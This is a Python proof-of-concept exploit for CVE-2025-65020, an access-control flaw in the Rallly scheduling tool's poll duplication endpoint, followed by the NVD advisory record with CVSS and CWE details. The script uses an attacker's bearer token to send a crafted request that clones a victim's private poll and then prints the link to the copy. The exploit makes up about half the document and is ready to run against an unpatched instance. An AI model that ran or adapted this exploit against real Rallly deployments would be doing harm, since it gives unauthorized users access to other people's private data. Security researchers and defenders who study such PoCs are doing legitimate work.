CVE-2025-65020

import requests import json # CVE-2025-65020 PoC - Rallly IDOR Vulnerability # Target: Rallly < 4.5.4 # Endpoint: /api/trpc/polls.duplicate TARGET_URL = "https://vulnerable-rallly-instance.com" ATTACKER_TOKEN = "attacker_auth_token_here" TARGET_POLL_ID = "victim_private_poll_id" # ID of poll to duplicate def exploit_idor(): """ Exploit IDOR vulnerability in Rallly poll duplication endpoint. This PoC demonstrates how an authenticated attacker can duplicate any poll by modifying the pollId parameter. """ headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {ATTACKER_TOKEN}', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Malicious request with victim poll ID payload = { 'json': { '0': { 'json': { 'pollId': TARGET_POLL_ID # Attacker-controlled poll ID } } } } endpoint = f"{TARGET_URL}/api/trpc/polls.duplicate" try: response = requests.post(endpoint, headers=headers, json=payload) if response.status_code == 200: result = response.json() if 'result' in result: new_poll_id = result['result']['data']['json']['id'] print(f"[+] SUCCESS: Poll duplicated successfully!") print(f"[+] New Poll ID: {new_poll_id}") print(f"[+] Access new poll at: {TARGET_URL}/poll/{new_poll_id}") return new_poll_id elif response.status_code == 401: print("[-] Authentication failed") else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") return None if __name__ == "__main__": print("=" * 60) print("CVE-2025-65020 - Rallly IDOR PoC") print("=" * 60) exploit_idor()

{"cve": {"id": "CVE-2025-65020", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:49.477", "lastModified": "2025-11-25T15:33:05.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an Insecure Direct Object Reference (IDOR) vulnerability in the poll duplication endpoint (/api/trpc/polls.duplicate) allows any authenticated user to duplicate polls they do not own by modifying the pollId parameter. This effectively bypasses access control and lets unauthorized users clone private or administrative polls. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-44w7-pf32-gv5m", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}